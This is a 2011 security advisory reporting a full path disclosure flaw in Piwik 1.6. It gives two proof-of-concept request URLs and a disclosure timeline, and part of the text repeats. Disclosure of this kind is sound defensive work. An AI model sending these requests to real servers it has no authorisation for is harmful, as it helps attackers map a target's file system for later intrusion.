SSCHADV2011-032 - Piwik 1.6 Full Path Disclosure
Advisory:
|
Piwik 1.6 Full Path Disclosure
|
Advisory ID:
|
SSCHADV2011-032
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on Piwik 1.6
|
Vendor URL:
|
|
Vendor Status:
|
informed but no fix available
|
CVE-ID:
|
-
|
======================
Vulnerability Description:
======================
Piwik 1.6 is prone to a Full Path Disclosure vulnerability
==============
Technical Details:
==============
http://<target>/piwik/?module=VisitsSummary&action=getEvolutionGraph&idSite=&period=day
http://<target>/piwik/index.php?module=LanguagesManager&action=saveLanguage
=====
Solution:
=====
no fix available!
================
Disclosure Timeline:
================
19-Oct-2011 – informed developers
19-Oct-2011 – response from vendor -> no fix
19-Oct-2011 – release date of this security advisory
====
Credits:
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References:
=======
http://piwik.org/
http://www.rul3z.de/advisories/SSCHADV2011-032.txt
Technical Details:
==============
http://<target>/piwik/?module=VisitsSummary&action=getEvolutionGraph&idSite=&period=day
http://<target>/piwik/index.php?module=LanguagesManager&action=saveLanguage
=====
Solution:
=====
no fix available!
================
Disclosure Timeline:
================
19-Oct-2011 – informed developers
19-Oct-2011 – response from vendor -> no fix
19-Oct-2011 – release date of this security advisory
====
Credits:
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References:
=======
http://piwik.org/
http://www.rul3z.de/advisories/SSCHADV2011-032.txt
Comments
Display comments as Linear | Threaded